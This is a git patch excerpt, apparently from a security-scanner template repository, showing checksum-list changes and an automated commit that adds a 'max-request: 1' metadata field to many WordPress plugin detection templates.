+http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad
+http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1
+http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f
+http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b
+http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d
+http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50
+http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848
+http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75
+http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb
http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259
-http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a
+http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788
http/technologies/wordpress-detect.yaml:fcd6c47e6ae72e3d87671b6cd0b892a0879adfec
http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed
http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69
@@ -6336,7 +6336,7 @@ network/cves/2017/CVE-2017-5645.yaml:73fa585ece4f10781721c99f894c4210175ad9df
network/cves/2018/CVE-2018-2628.yaml:745a4bcbf8dacea7659023d8a14b4c58e8a7ca6e
network/cves/2018/CVE-2018-2893.yaml:0a6d9638d166fb7b9c70b66eda35074a3160d35d
network/cves/2020/CVE-2020-11981.yaml:8cf01204e15f9205225a407e3573d04f1a3ebd7d
-network/cves/2020/CVE-2020-1938.yaml:14a91d0c0ae9951c40d32e52e6cce1fcc2a301cf
+network/cves/2020/CVE-2020-1938.yaml:ec1011a5a9d78a308f1cb0d4dfe6c8e6fb2d1683
network/cves/2020/CVE-2020-7247.yaml:731f878bf6fecab9df6d650f68e391befb479abe
network/cves/2021/CVE-2021-44521.yaml:337b7c516051ab9f27e3a87649c82108597cf54d
network/cves/2022/CVE-2022-0543.yaml:12250c6e9c2b36c2d1c286398819688e03f71817
@@ -6442,7 +6442,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e
ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec
-templates-checksum.txt:9f6c67a768bcbcca5a2a2ce1a4cd4714e93722e9
+templates-checksum.txt:bc8ae926a6ea9b5e1a8985ea717d2bc4eb46a9a0
wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f
From acfcac3e67f0671a4190ab2ad0e2243f54870592 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Fri, 23 Jun 2023 05:22:07 +0000
Subject: [PATCH 507/670] TemplateMan Update [Fri Jun 23 05:22:07 UTC 2023]
:robot:
---
http/technologies/wordpress/plugins/ad-inserter.yaml | 1 +
http/technologies/wordpress/plugins/add-to-any.yaml | 1 +
http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 +
http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 +
http/technologies/wordpress/plugins/akismet.yaml | 1 +
.../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 +
http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 +
.../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 +
.../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 +
http/technologies/wordpress/plugins/amp.yaml | 1 +
http/technologies/wordpress/plugins/antispam-bee.yaml | 1 +
http/technologies/wordpress/plugins/astra-sites.yaml | 1 +
http/technologies/wordpress/plugins/astra-widgets.yaml | 1 +
http/technologies/wordpress/plugins/autoptimize.yaml | 1 +
http/technologies/wordpress/plugins/backwpup.yaml | 1 +
http/technologies/wordpress/plugins/better-search-replace.yaml | 1 +
http/technologies/wordpress/plugins/better-wp-security.yaml | 1 +
.../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 +
http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 +
http/technologies/wordpress/plugins/breeze.yaml | 1 +
http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 +
.../wordpress/plugins/child-theme-configurator.yaml | 1 +
http/technologies/wordpress/plugins/classic-editor.yaml | 1 +
http/technologies/wordpress/plugins/classic-widgets.yaml | 1 +
.../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 +
http/technologies/wordpress/plugins/cloudflare.yaml | 1 +
http/technologies/wordpress/plugins/cmb2.yaml | 1 +
http/technologies/wordpress/plugins/coblocks.yaml | 1 +
http/technologies/wordpress/plugins/code-snippets.yaml | 1 +
http/technologies/wordpress/plugins/coming-soon.yaml | 1 +
http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 +
.../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 +
http/technologies/wordpress/plugins/contact-form-7.yaml | 1 +
http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 +
http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 +
http/technologies/wordpress/plugins/cookie-notice.yaml | 1 +
http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 +
.../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 +
http/technologies/wordpress/plugins/custom-css-js.yaml | 1 +
http/technologies/wordpress/plugins/custom-fonts.yaml | 1 +
http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 +
http/technologies/wordpress/plugins/disable-comments.yaml | 1 +
http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 +
http/technologies/wordpress/plugins/duplicate-page.yaml | 1 +
http/technologies/wordpress/plugins/duplicate-post.yaml | 1 +
http/technologies/wordpress/plugins/duplicator.yaml | 1 +
.../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 +
http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 +
http/technologies/wordpress/plugins/easy-google-fonts.yaml | 1 +
http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 +
http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 +
http/technologies/wordpress/plugins/elementor.yaml | 1 +
http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 +
http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 +
http/technologies/wordpress/plugins/envato-elements.yaml | 1 +
.../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 +
http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 +
.../wordpress/plugins/facebook-for-woocommerce.yaml | 1 +
http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 +
.../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 +
http/technologies/wordpress/plugins/flamingo.yaml | 1 +
http/technologies/wordpress/plugins/fluentform.yaml | 1 +
http/technologies/wordpress/plugins/font-awesome.yaml | 1 +
.../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 +
http/technologies/wordpress/plugins/formidable.yaml | 1 +
http/technologies/wordpress/plugins/forminator.yaml | 1 +
http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 +
http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 +
.../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 +
.../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 +
.../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 +
http/technologies/wordpress/plugins/google-site-kit.yaml | 1 +
.../wordpress/plugins/google-sitemap-generator.yaml | 1 +
http/technologies/wordpress/plugins/gtranslate.yaml | 1 +
http/technologies/wordpress/plugins/gutenberg.yaml | 1 +
http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 +
.../wordpress/plugins/header-and-footer-scripts.yaml | 1 +
.../wordpress/plugins/header-footer-code-manager.yaml | 1 +
.../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 +
http/technologies/wordpress/plugins/header-footer.yaml | 1 +
http/technologies/wordpress/plugins/health-check.yaml | 1 +
http/technologies/wordpress/plugins/hello-dolly.yaml | 1 +
http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 +
http/technologies/wordpress/plugins/imagify.yaml | 1 +
http/technologies/wordpress/plugins/imsanity.yaml | 1 +
.../wordpress/plugins/insert-headers-and-footers.yaml | 1 +
http/technologies/wordpress/plugins/instagram-feed.yaml | 1 +
.../wordpress/plugins/intuitive-custom-post-order.yaml | 1 +
http/technologies/wordpress/plugins/iwp-client.yaml | 1 +
http/technologies/wordpress/plugins/jetpack.yaml | 1 +
http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 +
http/technologies/wordpress/plugins/kirki.yaml | 1 +
http/technologies/wordpress/plugins/leadin.yaml | 1 +
.../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 +
http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 +
http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 +
http/technologies/wordpress/plugins/loco-translate.yaml | 1 +
http/technologies/wordpress/plugins/loginizer.yaml | 1 +
http/technologies/wordpress/plugins/loginpress.yaml | 1 +
.../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 +
http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 +
http/technologies/wordpress/plugins/mailpoet.yaml | 1 +
http/technologies/wordpress/plugins/maintenance.yaml | 1 +
http/technologies/wordpress/plugins/mainwp-child.yaml | 1 +
http/technologies/wordpress/plugins/malcare-security.yaml | 1 +
http/technologies/wordpress/plugins/megamenu.yaml | 1 +
http/technologies/wordpress/plugins/members.yaml | 1 +
http/technologies/wordpress/plugins/meta-box.yaml | 1 +
http/technologies/wordpress/plugins/ml-slider.yaml | 1 +
http/technologies/wordpress/plugins/newsletter.yaml | 1 +
.../wordpress/plugins/nextend-facebook-connect.yaml | 1 +
http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 +
http/technologies/wordpress/plugins/ninja-forms.yaml | 1 +
http/technologies/wordpress/plugins/ocean-extra.yaml | 1 +
.../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 +
http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 +
http/technologies/wordpress/plugins/optinmonster.yaml | 1 +
http/technologies/wordpress/plugins/otter-blocks.yaml | 1 +
http/technologies/wordpress/plugins/password-protected.yaml | 1 +
http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 +
http/technologies/wordpress/plugins/photo-gallery.yaml | 1 +
http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 +
http/technologies/wordpress/plugins/polylang.yaml | 1 +
http/technologies/wordpress/plugins/popup-builder.yaml | 1 +
http/technologies/wordpress/plugins/popup-maker.yaml | 1 +
http/technologies/wordpress/plugins/post-smtp.yaml | 1 +
http/technologies/wordpress/plugins/post-types-order.yaml | 1 +
.../wordpress/plugins/premium-addons-for-elementor.yaml | 1 +
http/technologies/wordpress/plugins/pretty-link.yaml | 1 +
http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 +
http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 +
http/technologies/wordpress/plugins/redirection.yaml | 1 +
http/technologies/wordpress/plugins/redux-framework.yaml | 1 +
http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 +
http/technologies/wordpress/plugins/safe-svg.yaml | 1 +
http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 +
http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 +
http/technologies/wordpress/plugins/sg-security.yaml | 1 +
http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 +
.../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 +
.../wordpress/plugins/simple-custom-post-order.yaml | 1 +
http/technologies/wordpress/plugins/siteguard.yaml | 1 +
http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 +
http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 +
http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 +
.../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 +
http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 +
http/technologies/wordpress/plugins/svg-support.yaml | 1 +
http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 +
http/technologies/wordpress/plugins/tablepress.yaml | 1 +
http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 +
http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 +
http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 +
http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 +
.../wordpress/plugins/translatepress-multilingual.yaml | 1 +
.../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 +
.../technologies/wordpress/plugins/under-construction-page.yaml | 1 +
http/technologies/wordpress/plugins/updraftplus.yaml | 1 +
http/technologies/wordpress/plugins/use-any-font.yaml | 1 +
http/technologies/wordpress/plugins/user-role-editor.yaml | 1 +
.../wordpress/plugins/velvet-blues-update-urls.yaml | 1 +
http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 +
.../wordpress/plugins/webp-converter-for-media.yaml | 1 +
http/technologies/wordpress/plugins/webp-express.yaml | 1 +
.../wordpress/plugins/widget-importer-exporter.yaml | 1 +
.../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 +
.../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 +
http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 +
.../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 +
.../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 +
http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 +
.../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 +
.../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 +
http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 +
http/technologies/wordpress/plugins/woocommerce.yaml | 1 +
http/technologies/wordpress/plugins/wordfence.yaml | 1 +
http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 +
http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 +
http/technologies/wordpress/plugins/worker.yaml | 1 +
http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 +
http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 +
http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 +
http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 +
http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 +
http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 +
http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 +
http/technologies/wordpress/plugins/wp-optimize.yaml | 1 +
http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 +
http/technologies/wordpress/plugins/wp-reset.yaml | 1 +
http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 +
http/technologies/wordpress/plugins/wp-smushit.yaml | 1 +
http/technologies/wordpress/plugins/wp-statistics.yaml | 1 +
http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 +
http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 +
http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 +
http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 +
http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 +
http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 +
http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 +
.../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 +
network/cves/2020/CVE-2020-1938.yaml | 2 +-
201 files changed, 201 insertions(+), 1 deletion(-)
diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml
index 7cbd1855ae..ebb5ba1042 100644
--- a/http/technologies/wordpress/plugins/ad-inserter.yaml
+++ b/http/technologies/wordpress/plugins/ad-inserter.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/ad-inserter/
metadata:
+ max-request: 1
plugin_namespace: ad-inserter
wpscan: https://wpscan.com/plugin/ad-inserter
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml
index 8d579ff23d..fddfbf3118 100644
--- a/http/technologies/wordpress/plugins/add-to-any.yaml
+++ b/http/technologies/wordpress/plugins/add-to-any.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/add-to-any/
metadata:
+ max-request: 1
plugin_namespace: add-to-any
wpscan: https://wpscan.com/plugin/add-to-any
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
index 4a6d8b7bbe..7a6e8a76ec 100644
--- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml
+++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/admin-menu-editor/
metadata:
+ max-request: 1
plugin_namespace: admin-menu-editor
wpscan: https://wpscan.com/plugin/admin-menu-editor
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
index e4eb308d39..940c0e614c 100644
--- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
+++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/advanced-custom-fields/
metadata:
+ max-request: 1
plugin_namespace: advanced-custom-fields
wpscan: https://wpscan.com/plugin/advanced-custom-fields
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml
index 97f1d8c18f..06cfd4950b 100644
--- a/http/technologies/wordpress/plugins/akismet.yaml
+++ b/http/technologies/wordpress/plugins/akismet.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/akismet/
metadata:
+ max-request: 1
plugin_namespace: akismet
wpscan: https://wpscan.com/plugin/akismet
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
index 10f104f2c7..90aa5881fd 100644
--- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
+++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/all-404-redirect-to-homepage/
metadata:
+ max-request: 1
plugin_namespace: all-404-redirect-to-homepage
wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
index 8addc28ded..1bf337da6c 100644
--- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/all-in-one-seo-pack/
metadata:
+ max-request: 1
plugin_namespace: all-in-one-seo-pack
wpscan: https://wpscan.com/plugin/all-in-one-seo-pack
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
index 2e579621ac..7cec152555 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/all-in-one-wp-migration/
metadata:
+ max-request: 1
plugin_namespace: all-in-one-wp-migration
wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
index 41e297ffeb..8a4b6133cd 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
metadata:
+ max-request: 1
plugin_namespace: all-in-one-wp-security-and-firewall
wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml
index 0dd8686ec3..cfa2e3d080 100644
--- a/http/technologies/wordpress/plugins/amp.yaml
+++ b/http/technologies/wordpress/plugins/amp.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/amp/
metadata:
+ max-request: 1
plugin_namespace: amp
wpscan: https://wpscan.com/plugin/amp
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml
index 359671f3bd..a92d9bde4e 100644
--- a/http/technologies/wordpress/plugins/antispam-bee.yaml
+++ b/http/technologies/wordpress/plugins/antispam-bee.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/antispam-bee/
metadata:
+ max-request: 1
plugin_namespace: antispam-bee
wpscan: https://wpscan.com/plugin/antispam-bee
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml
index 116e0c420a..59144c7dd5 100644
--- a/http/technologies/wordpress/plugins/astra-sites.yaml
+++ b/http/technologies/wordpress/plugins/astra-sites.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/astra-sites/
metadata:
+ max-request: 1
plugin_namespace: astra-sites
wpscan: https://wpscan.com/plugin/astra-sites
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml
index dc4703ef8d..df06ba2f35 100644
--- a/http/technologies/wordpress/plugins/astra-widgets.yaml
+++ b/http/technologies/wordpress/plugins/astra-widgets.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/astra-widgets/
metadata:
+ max-request: 1
plugin_namespace: astra-widgets
wpscan: https://wpscan.com/plugin/astra-widgets
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml
index 1426ac3ef2..2a79d529cc 100644
--- a/http/technologies/wordpress/plugins/autoptimize.yaml
+++ b/http/technologies/wordpress/plugins/autoptimize.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/autoptimize/
metadata:
+ max-request: 1
plugin_namespace: autoptimize
wpscan: https://wpscan.com/plugin/autoptimize
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml
index 78d1651ff4..556a113acc 100644
--- a/http/technologies/wordpress/plugins/backwpup.yaml
+++ b/http/technologies/wordpress/plugins/backwpup.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/backwpup/
metadata:
+ max-request: 1
plugin_namespace: backwpup
wpscan: https://wpscan.com/plugin/backwpup
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml
index f7219b373d..58d9a9d738 100644
--- a/http/technologies/wordpress/plugins/better-search-replace.yaml
+++ b/http/technologies/wordpress/plugins/better-search-replace.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/better-search-replace/
metadata:
+ max-request: 1
plugin_namespace: better-search-replace
wpscan: https://wpscan.com/plugin/better-search-replace
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml
index f688a68f72..6c9c485079 100644
--- a/http/technologies/wordpress/plugins/better-wp-security.yaml
+++ b/http/technologies/wordpress/plugins/better-wp-security.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/better-wp-security/
metadata:
+ max-request: 1
plugin_namespace: better-wp-security
wpscan: https://wpscan.com/plugin/better-wp-security
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
index 00e95c4263..7631e87d78 100644
--- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
+++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/black-studio-tinymce-widget/
metadata:
+ max-request: 1
plugin_namespace: black-studio-tinymce-widget
wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
index 212b2b13c4..c7daa26ac6 100644
--- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
+++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/breadcrumb-navxt/
metadata:
+ max-request: 1
plugin_namespace: breadcrumb-navxt
wpscan: https://wpscan.com/plugin/breadcrumb-navxt
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml
index 6318392c5c..68767e4dce 100644
--- a/http/technologies/wordpress/plugins/breeze.yaml
+++ b/http/technologies/wordpress/plugins/breeze.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/breeze/
metadata:
+ max-request: 1
plugin_namespace: breeze
wpscan: https://wpscan.com/plugin/breeze
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml
index e1a2a186e0..073618936d 100644
--- a/http/technologies/wordpress/plugins/broken-link-checker.yaml
+++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/broken-link-checker/
metadata:
+ max-request: 1
plugin_namespace: broken-link-checker
wpscan: https://wpscan.com/plugin/broken-link-checker
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
index 23614882a7..6aabc19e9f 100644
--- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml
+++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/child-theme-configurator/
metadata:
+ max-request: 1
plugin_namespace: child-theme-configurator
wpscan: https://wpscan.com/plugin/child-theme-configurator
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml
index 85965337cb..ac80e4f31b 100644
--- a/http/technologies/wordpress/plugins/classic-editor.yaml
+++ b/http/technologies/wordpress/plugins/classic-editor.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/classic-editor/
metadata:
+ max-request: 1
plugin_namespace: classic-editor
wpscan: https://wpscan.com/plugin/classic-editor
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml
index 33d903a1b4..15d7a24755 100644
--- a/http/technologies/wordpress/plugins/classic-widgets.yaml
+++ b/http/technologies/wordpress/plugins/classic-widgets.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/classic-widgets/
metadata:
+ max-request: 1
plugin_namespace: classic-widgets
wpscan: https://wpscan.com/plugin/classic-widgets
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
index 3c6f8f287b..40ccc15b27 100644
--- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
+++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/click-to-chat-for-whatsapp/
metadata:
